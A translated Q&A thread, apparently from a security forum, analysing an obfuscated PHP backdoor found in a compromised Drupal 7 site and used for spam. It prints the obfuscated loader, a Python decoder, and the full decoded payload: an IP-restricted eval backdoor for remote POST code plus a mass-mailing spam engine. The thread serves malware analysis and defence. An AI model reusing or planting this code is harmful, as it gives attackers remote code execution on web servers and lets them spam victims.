'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
'9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
'460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
'7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
'8AGObzwMCJXc';
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?>

Credo che sia stato usato per inviare gli spam come noi:

To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code

Ma come? Qual è il metodo della sua azione?

Un po 'più di background:

È stato trovato nell'istanza di Drupal 7 a sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php , tuttavia il file e il codice possono variare in base all'hack.

Un utente lo ha segnalato in sites/all/modules/i18n/i18n_block/stats7.php e il contenuto di questo script è stato leggermente diverso:

<?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
    
posta kenorb 15.04.2015 - 17:55
fonte

4 risposte

29

L'ultima riga esegue un eval() della funzione v78ZFAX () dato i due parametri in questo modo:

eval(v78ZFAX($vFHLJ89, $vIIJ30Y));

Questo primo parametro è la parte che occupa la maggior parte del codice. Viene assegnata tutta la spazzatura dall'aspetto casuale, con . che concatena tutte quelle stringhe insieme in un'unica stringa lunga:

$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ...

Il secondo parametro è questo array, che associa determinate lettere / numeri ad altre lettere / numeri:

$vIIJ30Y = Array(
    '1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');

La funzione stessa può essere riscritta per chiarezza:

function v78ZFAX($vJOJJ7T, $vRJ8WGX)
{
    $vM74216 = ''; 
    for($i=0; $i < strlen($vJOJJ7T); $i++)
    {
        $vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
    }
    return base64_decode($vM74216);
}

Inizia dichiarando una variabile vuota vM74216 e quindi per ogni cifra della prima variabile (quella super lunga) aggiunge un carattere a questa variabile attualmente vuota. La cifra aggiunta dipende dal risultato della condizione ternaria utilizzata dalla funzione isset() , che controlla semplicemente se la cifra i-esima dell'enorme numero ha una corrispondente voce di ricerca nell'array di mappatura dei caratteri.

Alla fine di tutto, Base64 decodifica la variabile risultante, che viene passata come parametro derivato della funzione eval() iniziale.

L'intero punto è l'offuscamento. Sembra un caos confuso, ma i personaggi vengono scambiati, concatenati, ecc. Fino a quando il suo carico non viene liberato. Questo viene fatto per impedire a un analista di conoscere immediatamente la natura dello script, oltre a bypassare le tecniche antivirus basate su firme.

Modifica

Usando questo hack di uno script Python (mi sento più a mio agio in Python):

import base64

TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}

LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT

NewVar = ''

for i in LongVar:
    if i in TheArray:
        NewVar += TheArray[i]
    else:
        NewVar += i

print base64.b64decode(NewVar)

Sono riuscito a ricavare il carico utile offuscato come:

if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
    eval(base64_decode($_POST["code"]));
    exit();
}

if (isset($_POST["type"]) && $_POST["type"]=="1")
{
    type1_send();
    exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{

}
elseif (isset($_POST["type"]))
{
    echo $_POST["type"];
    exit();
}

error_404();

function is_good_ip($ip)
{
    $goods = Array("6.185.239.", "8.138.118.");

    foreach ($goods as $good)
    {
        if (strstr($ip, $good) != FALSE)
        {
            return TRUE;
        }
    }

    return FALSE;
}

function type1_send()
{
    if(!isset($_POST["emails"])
            OR !isset($_POST["themes"])
            OR !isset($_POST["messages"])
            OR !isset($_POST["froms"])
            OR !isset($_POST["mailers"])
    )
    {
        exit();
    }

    if(get_magic_quotes_gpc())
    {
        foreach($_POST as $key => $post)
        {
            $_POST[$key] = stripcslashes($post);
        }
    }

    $emails = @unserialize(base64_decode($_POST["emails"]));
    $themes = @unserialize(base64_decode($_POST["themes"]));
    $messages = @unserialize(base64_decode($_POST["messages"]));
    $froms = @unserialize(base64_decode($_POST["froms"]));
    $mailers = @unserialize(base64_decode($_POST["mailers"]));
    $aliases = @unserialize(base64_decode($_POST["aliases"]));
    $passes = @unserialize(base64_decode($_POST["passes"]));

    if(isset($_SERVER))
    {
        $_SERVER['PHP_SELF'] = "/"; 
        $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
        }
    }

    if(isset($_FILES))
    {
        foreach($_FILES as $key => $file)
        {
            $filename = alter_macros($aliases[$key]);
            $filename = num_macros($filename);
            $filename = text_macros($filename);
            $filename = xnum_macros($filename);
            $_FILES[$key]["name"] = $filename;
        }
    }

    if(empty($emails))
    {
        exit();
    }

    foreach ($emails as $fteil => $email)
    {
        $theme = $themes[array_rand($themes)];
        $theme = alter_macros($theme["theme"]);
        $theme = num_macros($theme);
        $theme = text_macros($theme);
        $theme = xnum_macros($theme);

        $message = $messages[array_rand($messages)];
        $message = alter_macros($message["message"]);
        $message = num_macros($message);
        $message = text_macros($message);
        $message = xnum_macros($message);
        //$message = pass_macros($message, $passes);
        $message = fteil_macros($message, $fteil);

        $from = $froms[array_rand($froms)];
        $from = alter_macros($from["from"]);
        $from = num_macros($from);
        $from = text_macros($from);
        $from = xnum_macros($from);

        if (strstr($from, "[CUSTOM]") == FALSE)
        {
            $from = from_host($from);
        }
        else
        {
            $from = str_replace("[CUSTOM]", "", $from);
        }

        $mailer = $mailers[array_rand($mailers)];

        send_mail($from, $email, $theme, $message, $mailer);
    }
}

function send_mail($from, $to, $subj, $text, $mailer)
{
    $head = "";

    $un = strtoupper(uniqid(time()));

    $head .= "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";

    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";

    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";

    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);

    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function is_ip($str) {
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}

function from_host($content)
{

    $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);

    if (is_ip($host))
    {
        return $content;
    }

    $tokens = explode("@", $content);

    $content = $tokens[0] . "@" . $host . ">";

    return $content;
}

function error_404()
{
    header("HTTP/1.1 404 Not Found");

    $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );

    $content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
    $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );

    exit( $content );
}


function custom_http_request1($params)
{
    if( ! is_array($params) )
    {
        $params = array(
            'url' => $params,
            'method' => 'GET'
        );
    }

    if( $params['url']=='' ) return FALSE;

    if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
    $params['method'] = strtoupper($params['method']);
    if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE; 

    /* Приводим ссылку в правильный вид */
    $url = parse_url($params['url']);
    if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
    if( ! isset($url['path']) ) $url['path'] = '/';
    if( ! isset($url['host']) && isset($url['path']) )
    {
        if( strpos($url['path'], '/') )
        {
            $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
            $url['path'] = substr($url['path'], strpos($url['path'], '/'));
        }
        else
        {
            $url['host'] = $url['path'];
            $url['path'] = '/'; 
        }
    }
    $url['path'] = preg_replace("/[\/]+/", "/", $url['path']);
    if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";

    $port = isset($params['port']) ? $params['port']
            : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );

    $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
    if( ! isset($params['return']) ) $params['return'] = 'content';

    $scheme = $url['scheme']=='https' ? 'ssl://':'';
    $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
    if( $fp )
    {
        /* Mozilla */
        if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";

        $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
        $request .= "Host: {$url['host']}\r\n";
        $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
        if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
        if( isset($params['cookie']) )
        {
            $cookie = "";
            if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
            else $cookie = $params['cookie'];
            if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
        }
        $request .= "Connection: close\r\n";
        if( $params['method']=='POST' )
        {
            if( isset($params['data']) && is_array($params['data']) )
            {
                foreach($params['data'] AS $k => $v)
                    $data .= urlencode($k).'='.urlencode($v).'&';
                if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
            }
            $data .= "\r\n\r\n";

            $request .= "Content-type: application/x-www-form-urlencoded\r\n";
            $request .= "Content-length: ".strlen($data)."\r\n";
        }
        $request .= "\r\n";

        if( $params['method'] == 'POST' ) $request .= $data;

        @fwrite ($fp,$request); /* Send request */

        $res = ""; $headers = ""; $h_detected = false;
        while( !@feof($fp) )
        {
            $res .= @fread($fp, 1024); /* читаем контент */

            /* Проверка наличия загловков в контенте */
            if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
            {
                /* заголовки уже считаны - корректируем контент */
                $h_detected = true;

                $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
                $res = substr($res, strpos($res, "\r\n\r\n")+4);

                /* Headers to Array */
                if( $params['return']=='headers' || $params['return']=='array'
                    || (isset($params['redirect']) && $params['redirect']==true) )
                {
                    $h = explode("\r\n", $headers);
                    $headers = array();
                    foreach( $h as $k=>$v )
                    {
                        if( strpos($v, ':') )
                        {
                            $k = substr($v, 0, strpos($v, ':'));
                            $v = trim(substr($v, strpos($v, ':')+1));
                        }
                        $headers[strtoupper($k)] = $v;
                    }
                }
                if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
                {
                    $params['url'] = $headers['LOCATION'];
                    if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
                    if( $params['redirect-count']<10 )
                    {
                        $params['redirect-count']++;
                        $func = __FUNCTION__;
                        return @is_object($this) ? $this->$func($params) : $func($params);
                    }
                }
                if( $params['return']=='headers' ) return $headers;
            }
        }

        @fclose($fp);
    }
    else return FALSE;/* $errstr.$errno; */

    if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);

    return $res;
}

È interessante vedere alcuni commenti sul codice in russo. Google Translate fa bene a loro: %codice% "leggi contenuto"

$res .= @fread($fp, 1024); /* читаем контент */ "Verifica la disponibilità di titoli nel contenuto"

/* Проверка наличия загловков в контенте */ "le intestazioni sono già state lette - regola il contenuto"

    
risposta data 15.04.2015 - 18:12
fonte
3

Informazioni sullo script

Il codice è evidente script malevolo scritto in PHP per l'invio di spam e altre attività illegali.

In realtà questo script è molto facile da decodificare cambiando eval in echo e l'esecuzione di esso stamperà il codice sorgente ben formattato.

Il motivo per cui gli autori di questo exploit hanno speso così tanto tempo a rendere sicuro questo codice tramite la mappatura dell'array di trasposizione (nonostante il semplice metodo di decodifica) è che il suo codice può essere modificabile (metodo metamorfico ) e unico per ogni infezione del server che impedisce di essere facilmente rilevato dai metodi di rilevamento standard (antivirus, grep , Google, ecc.).

Metodo di azione

